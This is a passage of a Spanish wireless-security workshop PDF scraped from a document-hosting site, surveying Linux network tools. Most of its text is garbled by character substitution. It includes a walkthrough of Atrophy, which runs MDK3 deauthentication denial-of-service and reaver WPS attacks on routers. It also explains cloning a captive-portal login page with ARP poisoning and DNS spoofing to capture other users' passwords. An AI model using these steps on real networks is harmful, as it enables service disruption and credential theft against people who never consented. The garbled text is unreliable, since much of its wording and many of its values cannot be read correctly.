"e damos a >pen + nos da la opcion de selecionar ile) !irector+ o url8arc7ivo) directorio o url9

ile selecionamos el arc7ivo + nos mostrara los metadatos. %odemoslimpiarlos o descargarlos.

&rl Nos abrira un webcrawler) metemos la url + nos mostrara los metadatosde todos los arc7ivos de esa url.

96

Page 97: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 97/260

 !irector+ selecionamos el directorio + nos mostrara los metadatos de todoslos arc7ivos del directorio 8no rastrea subdirectorios9

Ge!tore! de Cone'i"n erramientas para gestionar las cone#iones e interaces de rediación

Net#or7 Manager StartInicia las interaces de red

Net#or7 Manager Stop!etiene las interaces de red

Sa7i! G

 sistente para conectarnos con un modem D* a internet en "inu# l inicialo nos aparecen una interace gráica en el terminal con distintosmenus

'a/isD* 0.<.0e  

 

x %lease select an action yz You can automate t7is selection b+ setting zz ,EN& variable on command line. zz zz C7oose action or 'a/isD* script to ollow. z

zxy zz z =. Connect wit7 D* z zz z <. ,ore options... z zz z D. bout 'a/isD* z zz z 4. E#it z z

z{| z

}  ~

97

Page 98: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 98/260

  z ] > ^ ]Cancel^ z{ 

 |

,EN&[C>NNEC11ard#are Tool! erramientas de 7ardware para monitori3ar + cambiar parametros denuestras interaces de red

Bmonerramienta 5ue sirve para monitori3ar nuestras interaces de red

ChaMAC 'cript 5ue sirve para cambiar todas las direcciones ,C de tu %C por unasaleatorias[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[

C7a,C 0.F-A b+ v/4F

98

Page 99: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 99/260

netenti.blogspot.com  %e5ueo script para cambiar todas

las direcciones ,C de tu %C por unas aleatorias. &sa c7amac --7elp para mas ino. %ara www.seguridadwireless.net  [[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[

%rivileges root---^ >PC7amac installdir--- >P

 utoboot 'tatus---^ >C7amac !atabase---^ >P!atabase <D<;A

C7amac ,ode-------^ Normal

Networ/ inteace?s <

et70 wlan0

[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[IN1ERCE et70(RICN1E Quanta Computer Inc,C >RI*IN" 00<Fee<AFMa,C C1&" b;c<a0F=eD=

[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[?[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[IN1ERCE wlan0(RICN1E Quanta ,icros+stems) INC.,C >RI*IN" 0==c4dDF0A4

,C C1&" 04=bAd<=0D 8Quanta ,icros+stems) INC.9[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[?

Reiniciando interaces + !C% ...,ediante iconig podras comprobar 5ue la mac realmente 7a cambiado.Iniciando servcio ?etc?rc.d?rc.inet=

Recuerda revisar las demas opciones con c7amac --7elp

1areas reali3adas ... asta pronto 9

99

Page 100: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 100/260

Con!ulta de /a3ricante'cript para consultar el abricante de un determinado punto de acceso.1enemos 5ue poner los primeros caracteres de la mac separados con

guiones en ve3 de puntos.Y nos mostrara el abricante del %Bamos a ver a continuación lo 5ue nos aparece al iniciarlo

(&'C!>R !E (RICN1E' %>R ,C www.seguridadwireless.net v=.=

Escribe los primeros caracteres de la mac ...

con guiones en ve3 de puntos.

Ejemplo mac 00-=-=EEjemplo abricante (el/in

!;-CM-C;

Resultado de la bus5ueda ...

!;-CM-C; 87e#9 ruba Networ/s

'elecciona una opción= - Reali3ar otra consulta< - 'alir

LinSSID erramienta con interace gráica 8*&I9 5ue nos permite ver la inormaciónde los % wii cercanos graicamente seg:n el canal donde emiten + la

recuencia.En el parte de arriba tambien podemos ver otros datos como ''I!) ,C)Canal) %rotocolo) cirado) etc

100

Page 101: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 101/260

 MacChangererramienta con interace gráica 8*&I9 para cambiar la mac de nuestrainterace wii 8wlan0 en nuestro caso9

101

Page 102: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 102/260

r$7illerramienta para bloc/ear las distintas seales de radio recuencia

&sage r/ill _options` command>ptions--version s7ow version 80.A9

Commands7elpeventlist _I!EN1IIER`bloc/ I!EN1IIERunbloc/ I!EN1IIER

w7ere I!EN1IIER is t7e inde# no. o an r/ill switc7 or one o

]id#^ all wii wlan bluetoot7 uwb ultrawideband wima# wwan gps m nc

Stop Mode Monitor  Como su nombre indica detiene el modo monitor de nuestra tarjeta wii

.a@emonitor%rograma 5ue sirve para monitori3ar la calidad + seal de nuestra wiixInterace 

 yzwlan0 8IEEE ;0<.==bgn) $%?$%<9) E''I! @@ z}"evels 

 ~z zz zz zz zz N> IN1ERCE !1 zz zz z

z z}'tatistics  ~zRK 0 80 (9) invalid 0 nwid) 0 cr+pt) 0 rag) 0 misc zz1K 0 80 (9) mac retries 0) missed beacons 0 z}Ino 

 ~zmode ,anaged) access point Not-ssociated zzre5uenc+?c7annel n?a) bitrate n?a zzpower mgt o) t#-power = d(m 8DF);= m$9 z

102

Page 103: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 103/260

zretr+ long limit M) rts?cts o) rag o zzencr+ption o 8no /e+ set9 z}Networ/ 

 ~

zwlan0 8&% (R>!C'1 ,&"1IC'19 zzmac 00=MC4!DF0A4) 5len =000 zzip n?a z{ 

 |=ino <l7ist Dscan 4 A Mpres ;7elp Fabout =05uitx"evel7istogram 

 yz z

z zz zz zz-------------------------------------------------------------------zz zz zz zz zz-------------------------------------------------------------------zz zz zz zz zz-------------------------------------------------------------------zz zz zz zz zz-------------------------------------------------------------------z

z zz zz zz zz-------------------------------------------------------------------zz zz zz zz z

103

Page 104: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 104/260

}e+  ~z_` sig lvl 8un/nown9 _` ns lvl 8un/nown9 _ ` '-N ratio 8un/nown9 z{ 

 |=ino <l7ist Dscan 4 A Mpres ;7elp Fabout =05uitx%reerences 

 yz - Interace - zz Interace wlan0 zz Cisco-st+le ,C addresses > zz 'can sort t+pe C7an?'ig zz 'can sort in ascending order > zz 'tatistics updates =00 ms z

z istogram update c+cles 4 zz "evel meter smoot7ness 0 zz !+namic ino updates =0 s zz zz - "evel scales - zz >verride scale autodetect > zz Random signals > zz "ow t7res7old action !isabled zz ig7 t7res7old action !isabled zz zz - 'tartup - zz 'tartup screen Ino screen zz zz 'ave coniguration zz zz zz zz zz z

z zz zz zz zz zz z{ 

 |=ino <l7ist Dscan 4 A Mpres ;7elp Fabout =05uit

104

Page 105: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 105/260

xbout  yz zz z

z zz zz zz zz zz zz zz wavemon - status monitor or wireless networ/ devices zz version 0.M. 8built 17u eb <0 0<004 &1C <0=49 zz z

z original b+ jan morgenstern ] janfjm-music.de^ zz distributed under t7e *N& general public license vD zz zz wavemon uses t7e wireless e#tensions b+ zz jean tourril7es ] jtf7pl.7p.com^ zz zz please send suggestions and bug reports to zz gerritferg.abdn.ac.u/  zz zz 7ttp??www.erg.abdn.ac.u/?ergcms?wavemon?  zz zz zz zz zz zz zz zz zz z

{  |=ino <l7ist Dscan 4 A Mpres ;7elp Fabout =05uit

$!amO;;)erramienta 5ue sirve para apagar + encender nuestra wii

 l iniciarla nos aparece como se usa&sage samM440 ]command^Commands

105

Page 106: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 106/260

 0?o 1urn > t7e wireless card.=?on 1urn >N t7e wireless card.g?get *et t7e state o t7e wireless card

i#Scanner  erramienta para escanear los puntos de acceso 8%9 wii cercanos.

 En la parte de arriba podemos ver la inormación de los %'i pinc7amos en cada uno en la parte de abajo podemos ver la intensidad deseal.

Rede!erramientas para obtener datos + capturar traico de los e5uiposconectados a nuestra red.

Angr I4 Scanner

&no de los escaneres ip mas amosos + usados.Es mu+ sencillo de usar. ,etemos arriba el rango 5ue 5ueremos escanear +le damos a 'tart

106

Page 107: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 107/260

arp!can'cript para 7acer un escaneo arp de un objetivo determinado dentro denuestra red

 l iniciar la 7erramienta nos aparece lo siguiente TTTTT

? ? TTTT

? T TT T TT TTTTT 8TTT TTT TT T T TT? ? VTT VT TTTTTTTTT ? TT? T VT ? TTTT T9 TTTT9 8T 8T ?T? TT .TT? TTTTT? TTTTT)TT T

T

 +uda arp-scan --7elp&so arp-scan interace opcionesEjemplo arp-scan -I wlan0 -l

%ara ver todas las opciones ponemoswiisla# k arp-scan --7elp&sage arp-scan _options` _7osts...`

1arget 7osts must be speciied on t7e command line unless t7e --ile option isgiven) in w7ic7 case t7e targets are read rom t7e speciied ile instead) ort7e --localnet option is used) in w7ic7 case t7e targets are generated romt7e networ/ interace I% address and netmas/.

107

Page 108: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 108/260

You will need to be root) or arp-scan must be '&I! root) in order to runarp-scan) because t7e unctions t7at it uses to read and write pac/etsre5uire root privilege.

17e target 7osts can be speciied as I% addresses or 7ostnames. You canalsospeci+ t7e target as I%networ/?bits 8e.g. =F<.=;.=.0?<49 to speci+ all 7ostsin t7e given networ/ 8networ/ and broadcast addresses included9) orI%start-I%end 8e.g. =F<.=;.=.D-=F<.=;.=.<M9 to speci+ all 7osts in t7einclusive range) or I%networ/Net,as/ 8e.g. =F<.=;.=.0<AA.<AA.<AA.09 tospeci+ all 7osts in t7e given networ/ and mas/.

17ese dierent options or speci+ing target 7osts ma+ be used bot7 on t7ecommand line) and also in t7e ile speciied wit7 t7e --ile option.

>ptions

Note w7ere an option ta/es a value) t7at value is speciied as a letter inangle brac/ets. 17e letter indicates t7e t+pe o data t7at is e#pected

]s^ c7aracter string) e.g. --ile[7ostlist.t#t.

]i^ n integer) w7ic7 can be speciied as a decimal number or as a7e#adecimal

number i preceeded wit7 0#) e.g. --arppro[<04; or --arpro[0#0;00.

]^ loating point decimal number) e.g. --bac/o[=.A.

]m^ n Et7ernet ,C address) w7ic7 can be speciied eit7er in t7e ormat0=<D4AM;Fab) or as 0=-<D-4A-M-;F-ab. 17e alp7abetic 7e#

c7aractersma+ be eit7er upper or lower case. E.g. --arps7a[0=<D4AM;Fab.

]a^ n I%v4 address) e.g. --arpspa[=0.0.0.=

]7^ (inar+ data speciied as a 7e#adecimal string) w7ic7 s7ould notinclude a leading 0#. 17e alp7abetic 7e# c7aracters ma+ be eit7erupper or lower case. E.g. --padding[aaaaaaaaaaaa

]#^ 'omet7ing else. 'ee t7e description o t7e option or details.

--7elp or -7 !ispla+ t7is usage message and e#it.

108

Page 109: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 109/260

--ile[]s^ or - ]s^ Read 7ostnames or addresses rom t7e speciied ileinstead o rom t7e command line. >ne name or I%address per line. &se @-@ or standard input.

--localnet or -l *enerate addresses rom networ/ interace coniguration.&se t7e networ/ interace I% address and networ/ mas/to generate t7e list o target 7ost addresses.17e list will include t7e networ/ and broadcastaddresses) so an interace address o =0.0.0.= wit7netmas/ <AA.<AA.<AA.0 would generate <A target7osts rom =0.0.0.0 to =0.0.0.<AA inclusive.I +ou use t7is option) +ou cannot speci+ t7e --ileoption or speci+ an+ target 7osts on t7e command line.17e interace speciications are ta/en rom t7e

interace t7at arp-scan will use) w7ic7 can bec7anged wit7 t7e --interace option.

--retr+[]i or -r ]i^ 'et total number o attempts per 7ost to ]i )deault[<.

--timeout[]i^ or -t ]i 'et initial per 7ost timeout to ]i^ ms) deault[A00.17is timeout is or t7e irst pac/et sent to eac7 7ost.subse5uent timeouts are multiplied b+ t7e bac/oactor w7ic7 is set wit7 --bac/o.

--interval[]#^ or -i ]#^ 'et minimum pac/et interval to ]#^.17is controls t7e outgoing bandwidt7 usage b+ limitingt7e rate at w7ic7 pac/ets can be sent. 17e pac/etinterval will be no smaller t7an t7is number.I +ou want to use up to a given bandwidt7) t7en it iseasier to use t7e --bandwidt7 option instead.17e interval speciied is in milliseconds b+ deault)or in microseconds i @u@ is appended to t7e value.

--bandwidt7[]#^ or -( ]#^ 'et desired outbound bandwidt7 to ]#^)deault[<A000.

17e value is in bits per second b+ deault. I +ouappend @@ to t7e value) t7en t7e units are /ilobitsper secL and i +ou append @,@ to t7e value) t7eunits are megabits per second.17e @@ and @,@ sui#es represent t7e decimal) notbinar+) multiples. 'o 4 is 4000) not AAD.You cannot speci+ bot7 --interval and --bandwidt7

109

Page 110: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 110/260

because t7e+ are just dierent wa+s to c7ange t7esame underl+ing parameter.

--bac/o[]^ or -b ]^ 'et timeout bac/o actor to ]^) deault[=.A0.

17e per-7ost timeout is multiplied b+ t7is actorater eac7 timeout. 'o) i t7e number o retriesis D) t7e initial per-7ost timeout is A00ms and t7ebac/o actor is =.A) t7en t7e irst timeout will beA00ms) t7e second MA0ms and t7e t7ird ==<Ams.

--verbose or -v !ispla+ verbose progress messages.&se more t7an once or greater eect= - !ispla+ t7e networ/ address and mas/ used w7en t7e

--localnet option is speciied) displa+ an+

non3ero pac/et padding) displa+ pac/ets receivedrom un/nown 7osts) and s7ow w7en eac7 pass t7roug7t7e list completes.

< - '7ow eac7 pac/et sent and received) w7en entriesare removed rom t7e list) t7e pcap ilter string)and counts o ,C?Bendor mapping entries.

D - !ispla+ t7e 7ost list beore scanning starts.

--version or -B !ispla+ program version and e#it.

--random or -R Randomise t7e 7ost list.17is option randomises t7e order o t7e 7osts in t7e7ost list) so t7e R% pac/ets are sent to t7e 7osts ina random order. It uses t7e nut7 s7ule algorit7m.

--numeric or -N I% addresses onl+) no 7ostnames.$it7 t7is option) all 7osts must be speciied asI% addresses. ostnames are not permitted. No !N'loo/ups will be perormed.

--snap[]i or -n ]i^ 'et t7e pcap snap lengt7 to ]i . !eault[4.17is speciies t7e rame capture lengt7. 17islengt7 includes t7e data-lin/ 7eader.17e deault is normall+ suicient.

--interace[]s^ or -I ]s^ &se networ/ interace ]s^.I t7is option is not speciied) arp-scan will searc7t7e s+stem interace list or t7e lowest numbered)conigured up interace 8e#cluding loopbac/9.

110

Page 111: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 111/260

17e interace speciied must support R%.

--5uiet or -5 >nl+ displa+ minimal output.I t7is option is speciied) t7en onl+ t7e minimum

inormation is displa+ed. $it7 t7is option) t7e>&I iles are not used.

--ignoredups or -g !onVt displa+ duplicate pac/ets.(+ deault) duplicate pac/ets are displa+ed and arelagged wit7 @8!&% n9@.

--ouiile[]s^ or -> ]s^ &se IEEE Et7ernet >&I to vendor mapping ile ]s^.I t7is option is not speciied) t7e deault ilenameis ieee-oui.t#t in t7e current director+. I t7at is

not ound) t7en t7e ile?usr?s7are?arp-scan?ieee-oui.t#t is used.

--iabile[]s^ or -> ]s^ &se IEEE Et7ernet I( to vendor mapping ile ]s .I t7is option is not speciied) t7e deault ilenameis ieee-iab.t#t in t7e current director+. I t7at isnot ound) t7en t7e ile?usr?s7are?arp-scan?ieee-iab.t#t is used.

--macile[]s^ or -> ]s^ &se custom Et7ernet ,C to vendor mappingile ]s^.

I t7is option is not speciied) t7e deault ilenameis mac-vendor.t#t in t7e current director+. I t7at isnot ound) t7en t7e ile?usr?s7are?arp-scan?mac-vendor.t#t is used.

--srcaddr[]m^ or -' ]m^ 'et t7e source Et7ernet ,C address to ]m^.17is sets t7e 4;-bit 7ardware address in t7e Et7ernetrame 7eader or outgoing R% pac/ets. It does not

c7ange t7e 7ardware address in t7e R% pac/et) see--arps7a or details on 7ow to c7ange t7at address.17e deault is t7e Et7ernet address o t7e outgoinginterace.

--destaddr[]m^ or -1 ]m^ 'end t7e pac/ets to Et7ernet ,C address ]m^17is sets t7e 4;-bit destination address in t7eEt7ernet rame 7eader.17e deault is t7e broadcast address .,ost operating s+stems will also respond i t7e R%

111

Page 112: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 112/260

re5uest is sent to t7eir ,C address) or to amulticast address t7at t7e+ are listening on.

--arps7a[]m^ or -u ]m^ &se ]m^ as t7e R% source Et7ernet address

17is sets t7e 4;-bit ars7a ield in t7e R% pac/etIt does not c7ange t7e 7ardware address in t7e rame7eader) see --srcaddr or details on 7ow to c7anget7at address. 17e deault is t7e Et7ernet address ot7e outgoing interace.

--arpt7a[]m^ or -w ]m^ &se ]m^ as t7e R% target Et7ernet address17is sets t7e 4;-bit art7a ield in t7e R% pac/et17e deault is 3ero) because t7is ield is not usedor R% re5uest pac/ets.

--protot+pe[]i^ or -+ ]i^ 'et t7e Et7ernet protocol t+pe to ]i^)deault[0#0;0.

17is sets t7e =-bit protocol t+pe ield in t7eEt7ernet rame 7eader.'etting t7is to a non-deault value will result in t7epac/et being ignored b+ t7e target) or sent to t7ewrong protocol stac/.

--arp7rd[]i or - ]i^ &se ]i or t7e R% 7ardware t+pe) deault[=.17is sets t7e =-bit ar7rd ield in t7e R% pac/et.17e normal value is = 8R%R!TE1ER9. ,ost) but notall) operating s+stems will also respond to 8R%R!TIEEE;0<9. ew s+stems respond to an+ value.

--arppro[]i or -p ]i &se ]i^ or t7e R% protocol t+pe) deault[0#0;00.17is sets t7e =-bit arpro ield in t7e R% pac/et.,ost operating s+stems onl+ respond to 0#0;00 8I%v49but some will respond to ot7er values as well.

--arp7ln[]i^ or -a ]i^ 'et t7e 7ardware address lengt7 to ]i ) deault[.17is sets t7e ;-bit ar7ln ield in t7e R% pac/et.It sets t7e claimed lengt7 o t7e 7ardware addressin t7e R% pac/et. 'etting it to an+ value ot7er t7ant7e deault will ma/e t7e pac/et non RC compliant.'ome operating s+stems ma+ still respond to it t7oug7.Note t7at t7e actual lengt7s o t7e ars7a and art7aields in t7e R% pac/et are not c7anged b+ t7isoptionL it onl+ c7anges t7e ar7ln ield.

112

Page 113: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 113/260

--arppln[]i or -% ]i^ 'et t7e protocol address lengt7 to ]i^) deault[4.17is sets t7e ;-bit arpln ield in t7e R% pac/et.It sets t7e claimed lengt7 o t7e protocol address

in t7e R% pac/et. 'etting it to an+ value ot7er t7ant7e deault will ma/e t7e pac/et non RC compliant.'ome operating s+stems ma+ still respond to it t7oug7.Note t7at t7e actual lengt7s o t7e arspa and artpaields in t7e R% pac/et are not c7anged b+ t7isoptionL it onl+ c7anges t7e arpln ield.

--arpop[]i^ or -o ]i &se ]i^ or t7e R% operation) deault[=.17is sets t7e =-bit arop ield in t7e R% pac/et.,ost operating s+stems will onl+ respond to t7e value =

8R%>%TREQ&E'19. owever) some s+stems will respondto ot7er values as well.

--arpspa[]a^ or -s ]a^ &se ]a^ as t7e source I% address.17e address s7ould be speciied in dotted 5uad ormatLor t7e literal string @dest@) w7ic7 sets t7e sourceaddress to be t7e same as t7e target 7ost address.17is sets t7e D<-bit arspa ield in t7e R% pac/et.'ome operating s+stems c7ec/ t7is) and will onl+respond i t7e source address is wit7in t7e networ/o t7e receiving interace. >t7ers donVt care) andwill respond to an+ source address.(+ deault) t7e outgoing interace address is used.

$RNIN* 'etting arspa to t7e destination I% addresscan disrupt some operating s+stems) as t7e+ assumet7ere is an I% address clas7 i t7e+ receive an R%re5uest or t7eir own address.

--padding[]7^ or - ]7^ 'peci+ padding ater pac/et data.'et t7e padding data to 7e# value ]7^. 17is data isappended to t7e end o t7e R% pac/et) ater t7e data.,ost) i not all) operating s+stems will ignore an+padding. 17e deault is no padding) alt7oug7 t7eEt7ernet driver on t7e sending s+stem ma+ pad t7epac/et to t7e minimum Et7ernet rame lengt7.

--llc or -" &se RC =04< ""C raming wit7 'N%.17is option causes t7e outgoing R% pac/ets to use

113

Page 114: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 114/260

IEEE ;0<.< raming wit7 a 'N% 7eader as describedin RC =04<. 17e deault is to use Et7ernet-IIraming.arp-scan will decode and displa+ received R% pac/ets

in eit7er Et7ernet-II or IEEE ;0<.< ormatsirrespective o t7is option.

--vlan[]i^ or -Q ]i &se ;0<.=Q tagging wit7 B"N id ]i .17is option causes t7e outgoing R% pac/ets to use;0<.=Q B"N tagging wit7 a B"N I! o ]i^) w7ic7 s7ouldbe in t7e range 0 to 40FA inclusive.arp-scan will alwa+s decode and displa+ received R%pac/ets in ;0<.=Q ormat irrespective o t7is option.

--pcapsaveile[]s^ or -$ ]s^ $rite received pac/ets to pcap saveile]s^.17is option causes received R% responses to be writtento t7e speciied pcap saveile as well as being decodedand displa+ed. 17is saveile can be anal+sed wit7programs t7at understand t7e pcap ile ormat) suc7 as@tcpdump@ and @wires7ar/@.

--rtt or -! !ispla+ t7e pac/et round-trip time.

Report bugs or send suggestions to arp-scanfnta-monitor.com 'ee t7e arp-scan 7omepage at 7ttp??www.nta-monitor.com?tools?arp-scan?  

Atroph erramienta para 7acer un ata5ue ,!D de !enegacion de 'ervicio 8!!>'9a los routers wii para resetearlos remotamente.El programa se 7ace un poco pesado +a 5ue en cada paso nos pide 5ueconirmemos pulsando Y.Bamos a ver a continuación lo 5ue nos sale al abrirlo + lo 5ue debemos poner 

en cada opción 5ue nos da

trop7+ ,d/D-irodump-ng-Reaver 1ool ,!D ,ultiple Bector !!>' 'etup to Reset $ireless Routers Remotel+ ,us/et 1eam - 'o#ro#<<=< Collaboration

]]] "" EKI'1IN* ,>NI1>R IN1ERCE' 8i.e. mon0 mon= etc.9 $I""(E C"ERE! ^^^

114

Page 115: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 115/260

  ]]]] SS!o +ou wis7 to continue....SS ^^^%lease conirm b+ pressing 8+?Y9 to continue....%ress 8n?N9 to abortPP..%ress an+ ot7er /e+ to tr+ again

+

You entered +. Continuing ...Interace C7ipset !river

wlan0t7eros RF<;0 at7F/ - _p7+0`

!o +ou wis7 to use standard or advanced settingS17ese advanced settings include.

=. 'etting 'peciic ,ac ddress to +our wii device.<. dd -r #+ command to reaver.

Enter 8s?'9 or standard or 8a?9 or advanced.s

You entered s t+pe 8+?Y9 to conirm or 8n?N9 to tr+ again.+

wlan0 IEEE ;0<.==bgn E''I!o?an+,ode,anaged ccess %oint Not-ssociated 1#-%ower[= d(mRetr+ long limitM R1' t7ro ragment t7roEncr+ption /e+o%ower ,anagemento

lo no wireless e#tensions.

et70 no wireless e#tensions.

$7at wireless device will +ou use to perorm t7e attac/8i.e. wlan0)at70 etc9S  listing o devices is s7own above.wlan0

You entered wlan0 t+pe 8+?Y9 to conirm or 8n?N9 to tr+ again.+

!o +ou wis7 to boost +our wii device power to D0d(mS17is routine wor/s or t7e $&'>D andma+ wor/ wit7 ot7er devices.

115

Page 116: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 116/260

  1+pe 8+?Y9 or +es or 8n?N9 or no.+ ssigning a random mac address to device.Current ,C 00=Mc4dDF0A4 8Quanta ,icros+stems) Inc.9

%ermanent ,C 00=Mc4dDF0A4 8Quanta ,icros+stems) Inc.9New ,C aFFb;d;M4de 8un/nown9

ound < processes t7at could cause trouble.I airodump-ng) airepla+-ng or airtun-ng stops wor/ing atera s7ort period o time) +ou ma+ want to /ill 8some o9 t7emP

%I! Name=M<4 Networ/,anager

=MD wpaTsupplicant

Interace C7ipset !river

wlan0t7eros RF<;0 at7F/ - _p7+0`8monitor mode enabled on mon09

wlan0 IEEE ;0<.==bgn E''I!o?an+,ode,anaged re5uenc+<.4M< *3 ccess %oint Not-ssociated

  1#-%ower[= d(mRetr+ long limitM R1' t7ro ragment t7roEncr+ption /e+o%ower ,anagemento

lo no wireless e#tensions.

mon0 IEEE ;0<.==bgn ,ode,onitor re5uenc+<.4M< *3 1#-%ower[= d(m

Retr+ long limitM R1' t7ro ragment t7ro

%ower ,anagemento

et70 no wireless e#tensions.

$7at wireless monitor interace 8i.e. mon0) mon=9 willbe used b+ md/D)reaver and airodump-ngS  listing o devices is s7own above.

mon0

You entered mon0 t+pe 8+?Y9 to conirm or 8n?N9 to tr+ again.

116

Page 117: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 117/260

Page 118: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 118/260

0cDMdc<;0da

!o +ou wis7 to use (eacon lood ,odeS1+pe 8+?Y9 or +es or 8n?N9 or no.

+!o +ou wis7 use $% downgrade modeS

1+pe 8+?Y9 or +es or 8n?N9 or no.+

!> N>1 &'E &1>,1IC ,>!E &N1I" Y>& !E1ER,INE (I"I1Y 1> RE'E1 R>&1ER IN ,N&" ,>!E

!o +ou wis7 to use automatic mode or manual modeS

In automatic mode +ou can set time to run t7e md/D deaut7. ter time selected 7as passed) md/D will s7ut down and reaverwill run till $%' loc/ing is seen) t7en md/D will run again.

&se C1R"-C on program page to s7utdown

In automatic mode reaver output is written to a ile named?root?reaverlogile not to t7e screen.

1+pe 8a?9 or automatic mode or 8m?,9 or manual modea

ow long in minutes do +ou want md/D to run beoreSs7utting down and starting reaver. ter time selected e#pires) md/D will s7ut down and reaver

will start and run till $%' loc/ing is seen.Enter time in minutes onl+P

<

You entered < min. t+pe 8+?Y9 to conirm or 8n?N9 to tr+ again.+

,d/D will run or < minutes....[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[

 7ora nos abre varias ventanas + comien3a el ata5ue de desautentiicación,d/D 5ue durara el tiempo 5ue le pusimos 8<min en nuestro caso9'i 5ueremos pararlo antes podemos pulsar CtrlhC.&na ve3 pasado el tiempo establecido inali3ara el ata5ue ,d/D + se iniciarareaver.

118

Page 119: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 119/260

Page 120: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 120/260

 --^ %oniendo en marc7a el servidor web...

--^ %oniendo en marc7a envenenamiento R%...

--^ %oniendo en marc7a alsiicación de resoluciones !N'...

---------------------------------------------------------------------------El ata5ue se está ejecutandoP%ulsa la tecla @Enter@ para detener el ata5ue + salir.

"a idea de este ata5ue es 5ue si alguien se conecta a nuestra red vea elinde#.7tml de nuestro servidor web.En este video podemos ver como se usa la 7erramienta

7ttp??www.+outube.com?watc7Sv[rMrnmF<;d4 

Como u!ar El CaKador CaKado para capturar contra!ea!>tro posible uso de esta 7erramienta es para capturar contraseas deportales cautivos a los 5ue deseamos acceder.Bamos a e#plicar como 7ar2amos en este caso.%rimero debemos conectarnos al punto de acceso abierto 8sin encriptación9con el portal cautivo.

 l conectarnos nos abrira el sitio web de login del portal cautivo.En ireo# le damos a botón derec7o - ver código de la página"o copiamos) vamos a la 7erramienta) le damos a editar inde#.7tml + lopegamos.'i el portal cautivo tiene alg:na imagen debemos tambien ponerla.%ara ello en ireo# le damos a rc7ivo - *uardar como - %agina webcompleta"uego copiamos el contenido de la web inclu+endo la carpeta de imagenes aldirectorio?tmp?ca3ador-ca3ado=DA0?www?En este caso si el arc7ivo del portal cautivo 5ue descargamos tiene un

nombre distinto a inde#.7tml!ebemos editar el arc7ivo?tmp?ca3ador-ca3ado=DA0?lig7ttpd.cg lig7ttpd coniguration ileserver.modules [8@modTaccess@)@modTaccesslog@)@modTrewrite@)@modTredirect@9inde#-ile.names [ 8 @inde#.7tml@9mimet+pe.assign [ [email protected]@ [^ @te#[email protected] [ 8@?8.9@ [^ @?inde#[email protected] [ 8@?@ [^ @?inde#.7tml@9

120

Page 121: Taller de Seguridad Inalambrica.pdf

